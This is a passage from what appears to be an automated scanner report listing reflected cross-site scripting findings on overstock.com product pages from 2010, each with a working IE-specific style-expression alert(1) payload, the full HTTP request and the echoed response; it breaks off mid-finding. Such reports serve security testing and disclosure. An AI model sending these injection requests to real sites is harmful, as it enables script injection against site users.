Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5235311|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:53 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:53 GMT; Path=/
Keep-Alive: timeout=5, max=30
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109859

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Fe
...[SNIP]...
<input type="hidden" name="bd6ae"style="x:expression(alert(1))"dba8e86bc84" value="1"/>
...[SNIP]...

2.33. http://www.overstock.com/Clothing-Shoes/Ferrecci-Mens-Grey-Two-button-Suit/4251947/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ferrecci-Mens-Grey-Two-button-Suit/4251947/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 734dc"style%3d"x%3aexpression(alert(1))"74977cb26be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 734dc"style="x:expression(alert(1))"74977cb26be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Ferrecci-Mens-Grey-Two-button-Suit/4251947/product.html?734dc"style%3d"x%3aexpression(alert(1))"74977cb26be=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:26 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:26 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4251947|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:26 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404766346:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:26 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113583

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Fe
...[SNIP]...
<input type="hidden" name="734dc"style="x:expression(alert(1))"74977cb26be" value="1"/>
...[SNIP]...

2.34. http://www.overstock.com/Clothing-Shoes/Ferrecci-Mens-Light-Chocolate-Brown-Suit/4255610/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ferrecci-Mens-Light-Chocolate-Brown-Suit/4255610/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca49"style%3d"x%3aexpression(alert(1))"32b9b3f096 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ca49"style="x:expression(alert(1))"32b9b3f096 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.

Request

GET /Clothing-Shoes/Ferrecci-Mens-Light-Chocolate-Brown-Suit/4255610/product.html?3ca49"style%3d"x%3aexpression(alert(1))"32b9b3f096=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:14 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:14 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289404754250:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:14 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4255610|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:14 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106946

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Fe
...[SNIP]...
<input type="hidden" name="3ca49"style="x:expression(alert(1))"32b9b3f096" value="1"/>
...[SNIP]...

2.35. http://www.overstock.com/Clothing-Shoes/Fringed-Pashmina-Shawl/4587463/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Fringed-Pashmina-Shawl/4587463/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1548"style%3d"x%3aexpression(alert(1))"8fddb195cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1548"style="x:expression(alert(1))"8fddb195cf9 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.

Request

GET /Clothing-Shoes/Fringed-Pashmina-Shawl/4587463/product.html?c1548"style%3d"x%3aexpression(alert(1))"8fddb195cf9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:05 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:05 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408225260:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:05 GMT; Path=/
Set-Cookie: mxcproclicks=4587463|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:05 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109853

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Fr
...[SNIP]...
<input type="hidden" name="c1548"style="x:expression(alert(1))"8fddb195cf9" value="1"/>
...[SNIP]...

2.36. http://www.overstock.com/Clothing-Shoes/Fringed-Pashmina-Wrap/4587460/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Fringed-Pashmina-Wrap/4587460/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d63f"style%3d"x%3aexpression(alert(1))"5854008dc02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d63f"style="x:expression(alert(1))"5854008dc02 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.

Request

GET /Clothing-Shoes/Fringed-Pashmina-Wrap/4587460/product.html?5d63f"style%3d"x%3aexpression(alert(1))"5854008dc02=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:42 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4587460|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:42 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405082348:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:42 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Fr
...[SNIP]...
<input type="hidden" name="5d63f"style="x:expression(alert(1))"5854008dc02" value="1"/>
...[SNIP]...

2.37. http://www.overstock.com/Clothing-Shoes/Glaze-by-Adi-Womens-Faux-Suede-Buckle-Accent-Tall-Boots/5162852/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Glaze-by-Adi-Womens-Faux-Suede-Buckle-Accent-Tall-Boots/5162852/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50570"style%3d"x%3aexpression(alert(1))"1fd492eab32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50570"style="x:expression(alert(1))"1fd492eab32 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.

Request

GET /Clothing-Shoes/Glaze-by-Adi-Womens-Faux-Suede-Buckle-Accent-Tall-Boots/5162852/product.html?50570"style%3d"x%3aexpression(alert(1))"1fd492eab32=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:01 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5162852|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:01 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408281246:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:01 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124802

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Gl
...[SNIP]...
<input type="hidden" name="50570"style="x:expression(alert(1))"1fd492eab32" value="1"/>
...[SNIP]...

2.38. http://www.overstock.com/Clothing-Shoes/Grane-Womens-Double-breasted-Military-Coat/5237784/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Grane-Womens-Double-breasted-Military-Coat/5237784/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8767c"style%3d"x%3aexpression(alert(1))"30caaea086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8767c"style="x:expression(alert(1))"30caaea086 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.

Request

GET /Clothing-Shoes/Grane-Womens-Double-breasted-Military-Coat/5237784/product.html?8767c"style%3d"x%3aexpression(alert(1))"30caaea086=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:51 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408091353:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5237784|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:51 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:51 GMT; Path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112892

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Gr
...[SNIP]...
<input type="hidden" name="8767c"style="x:expression(alert(1))"30caaea086" value="1"/>
...[SNIP]...

2.39. http://www.overstock.com/Clothing-Shoes/Guess-Womens-Oversize-Flower-Sunglasses/4226816/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Guess-Womens-Oversize-Flower-Sunglasses/4226816/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6938"style%3d"x%3aexpression(alert(1))"651945f2caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6938"style="x:expression(alert(1))"651945f2caa in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.

Request

GET /Clothing-Shoes/Guess-Womens-Oversize-Flower-Sunglasses/4226816/product.html?c6938"style%3d"x%3aexpression(alert(1))"651945f2caa=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4226816|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:41 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408201034:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:41 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=43
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111547

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Gu
...[SNIP]...
<input type="hidden" name="c6938"style="x:expression(alert(1))"651945f2caa" value="1"/>
...[SNIP]...

2.40. http://www.overstock.com/Clothing-Shoes/Jessica-Simpson-Womens-Double-breasted-Coat/5149474/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Jessica-Simpson-Womens-Double-breasted-Coat/5149474/product.html

Issue detail

